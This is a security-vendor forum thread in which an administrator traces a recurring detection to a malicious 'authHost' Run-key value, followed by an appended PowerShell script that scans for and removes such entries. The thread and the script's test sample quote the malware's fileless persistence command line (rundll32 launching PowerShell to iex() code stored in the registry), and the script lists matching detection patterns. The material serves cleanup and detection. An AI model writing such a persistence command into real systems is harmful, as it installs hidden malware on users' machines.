This keeps showing up in one of our client machines in the registry with the Registry scanner, Detection engine 20939 (20200303):

Hash 8ECE3FFE602D59D1E38F9506F5DA1FC280AADAF8

  \REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

the ESMC says that it was "cleaned by deleting," but then it shows up a few hours later. Is there some way to identify a process that is reinserting this?  Or what else should I do next?

14 minutes ago, Carl S said:

\REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

Did you manually check what's in that registry key? Display a screen shot of what's in the key.

10 minutes ago, itman said:

Did you manually check what's in that registry key? Display a screen shot of what's in the key.

When I search for that key I don't find it in regedit.


Search for:

HKEY_USERS\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run


Please provide ESET Log Collector logs from the machine.

16 hours ago, itman said:

Search for:

HKEY_USERS\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

Duh, didn't catch that, I just cut and pasted.  Thanks.


OK, found it by navigating to it.  Could not get search to work.

 

In the meantime, I have ESET client issues on that machine, probably due to my own fault.  :(

50 minutes ago, Carl S said:

OK, found it by navigating to it.  Could not get search to work.

So was there anything present in that registry key?


The suspicious part seems to be:

 

key: authHost

value:
rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))

 

12 hours ago, Marcos said:

Please provide ESET Log Collector logs from the machine.

Working on this.  I killed off the ESET agent accidentally, while trying to uninstall the competitor's product that wasn't successfully uninstalled before installing the ESET agent.  Now up and running again, and will get the logs.  (Ok, it's collecting right now)

It's been years since I've submitted these type of logs, so remind me, do I attach them to the post, or send them in some other way? Seems like they may have some confidential stuff.

13 hours ago, Marcos said:

Please provide ESET Log Collector logs from the machine.

Hmm.  I get a message from the Log Collector that says "An error occurred during collection of files. See the log for more info."

1 hour ago, Carl S said:

The suspicious part seems to be:

 

key: authHost

value:
rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))

 

I would say it is malicious.

To be on the safe side, export the reg. key to a save location. Then delete this crud. If for some very remote reason removing the crud causes system issues, you can always import the reg. key to restore it.

Note that authhost.exe is a legit Win system process, but that is obviously what is not running here.

Edited by itman

21 minutes ago, itman said:

I would say it is malicious.

To be on the safe side, export the reg. key to a save location. Then delete this crud. If for some very remote reason removing the crud causes system issues, you can always import the reg. key to restore it.

Note that authhost.exe is a legit Win system process, but that is obviously what is not running here.

Am I deleting the whole key / value pair or the value and leaving the key?

14 hours ago, Marcos said:

Please provide ESET Log Collector logs from the machine.

Marcos, I re-ran the collector on a whim, and this time, it worked.  I now have the zip file ready.

44 minutes ago, Carl S said:

Am I deleting the whole key / value pair or the value and leaving the key?

I believe what is shown in your reg. key is this:

[image attachment: Eset_Reg_Malware.png]

BTW - when I tried to enter the rundll.exe code as data, Eset immediately detected it as the PowerShell malware detection you're receiving. Hence, it doesn't display in the screen shot.

Anyway, you will be deleting "authHost" which BTW is not a registry key. It is a String value. Deleting authHost will also remove any data associated with it which is the malicious code.

Edited by itman


I suspect what the malware did was a registry Import or equivalent to get around Eset's detection of the malicious code.


Also check out this reg key: HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E. This is what the PowerShell script was using.

Have a feeling the "D4062752-23C4-26DB-4D48-07BAD1FC2B8E" sub-key has to go along with possibly the actual D4062752-23C4-26DB-4D48-07BAD1FC2B8E key itself.

Edited by itman

10 hours ago, Carl S said:

Marcos, I re-ran the collector on a whim, and this time, it worked.  I now have the zip file ready.

You can upload it here; only ESET staff and the poster are granted access to attachments. Alternatively you can upload the archive to a safe location and drop me a personal message with a download link.

14 hours ago, itman said:

Also check out this reg key: HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E. This is what the PowerShell script was using.

Have a feeling the "D4062752-23C4-26DB-4D48-07BAD1FC2B8E" sub-key has to go along with possibly the actual D4062752-23C4-26DB-4D48-07BAD1FC2B8E key itself.

I was thinking that myself, even though I'm not all that familiar with the registry, it was clear the powershell string was pointing to that other registry item.


Hi Marcos, here is the attachment.

I removed the value of the authHost line.  But other than that, everything else is the same.  FWIW, I have no new detections since the 4th.

[attachment: 10485-baker01-ees_logs.zip]

Just now, Carl S said:

I was thinking that myself, even though I'm not all that familiar with the registry, it was clear the powershell string was pointing to that other registry item.

Just be careful about deleting stuff from the registry. Either back it up first, or export any keys being modified/deleted prior to any registry cleaning exercise.

12 minutes ago, itman said:

Just be careful about deleting stuff from the registry. Either back it up first, or export any keys being modified/deleted prior to any registry cleaning exercise.

Absolutely. For now, I'm holding off on any more changes until Marcos posts again to the thread. One of my main concerns was that the logs said ESET was cleaning by deleting repeatedly over several days, but clearly it was either not deleting or something was putting it back. For now, though, it's gone 16 hours or so without being re-detected and it is still not in the registry since manually removing it yesterday.


Please delete the following registry values and then reboot the machine:
HKU\S-1-5-21-3146671537-2346468688-2395455220-1182\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\authHost
HKCU\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E\Auxibrkr
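A defender-side script, added here and not part of the thread or of any ESET tooling, that does what the thread works out by hand: it walks every loaded user hive's Run key, flags values with the shape of the entry posted above (rundll32/ShellExec_RunDLL launching PowerShell that iex()'s text read back out of the registry), and exports the key before deleting only the named string value. It assumes an elevated session; the helper names and the backup directory are my own choices.

```powershell
# Added example, not from the thread: find Run-key values shaped like the persistence
# entry above, export the key before touching it, then remove just the named value.
# Assumes an elevated session so every loaded user hive under HKEY_USERS is readable.

# Indicators taken from the value posted in the thread: rundll32/ShellExec_RunDLL launching
# powershell that iex()'s text pulled out of another registry value.
$SuspiciousPatterns = @(
    'ShellExec_RunDLL',                  # rundll32 shell32.dll,ShellExec_RunDLL launcher
    '\biex\b|Invoke-Expression',         # executes the decoded text
    'Get-ItemProperty\s+[''"]?HKCU:'     # payload fetched from the registry, not a file
)

function Test-SuspiciousRunValue {
    param([string]$CommandLine)
    # Require at least two indicators to co-occur so ordinary Run entries are not flagged.
    $hits = @($SuspiciousPatterns | Where-Object { $CommandLine -match $_ })
    return $hits.Count -ge 2
}

function Get-SuspiciousRunEntries {
    # Walk each loaded hive's Run key (HKEY_USERS\<SID>\...\Run), the location the
    # detection in the thread pointed at.
    foreach ($hive in Get-ChildItem Registry::HKEY_USERS -ErrorAction SilentlyContinue) {
        $runKey = "Registry::HKEY_USERS\$($hive.PSChildName)\Software\Microsoft\Windows\CurrentVersion\Run"
        if (-not (Test-Path $runKey)) { continue }
        foreach ($p in (Get-ItemProperty -Path $runKey).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PowerShell's own metadata properties
            if (Test-SuspiciousRunValue -CommandLine ([string]$p.Value)) {
                [pscustomobject]@{ Key = $runKey; Name = $p.Name; Value = $p.Value }
            }
        }
    }
}

function Remove-RunEntrySafely {
    param([string]$Key, [string]$Name, [string]$BackupDir = "$env:TEMP\reg-backup")
    # Export first (the advice given in the thread), then delete only the named string
    # value, never the whole Run key.
    New-Item -ItemType Directory -Path $BackupDir -Force | Out-Null
    $backup = Join-Path $BackupDir ("Run-{0}.reg" -f (Get-Date -Format 'yyyyMMdd-HHmmss'))
    reg.exe export ($Key -replace '^Registry::', '') $backup /y | Out-Null
    Remove-ItemProperty -Path $Key -Name $Name -Confirm
}

# Constructed sample with the shape of the value posted above; exercises the check offline.
$sample = 'rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty ''HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E'').Auxibrkr))'
Test-SuspiciousRunValue -CommandLine $sample
Get-SuspiciousRunEntries | Format-Table -AutoSize
```

The same export-then-delete step applies to the second value named above (the Auxibrkr value under the AppDataLow key), which holds the text the Run entry feeds to iex; reboot afterwards as instructed and re-run Get-SuspiciousRunEntries to confirm nothing has put the entry back.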
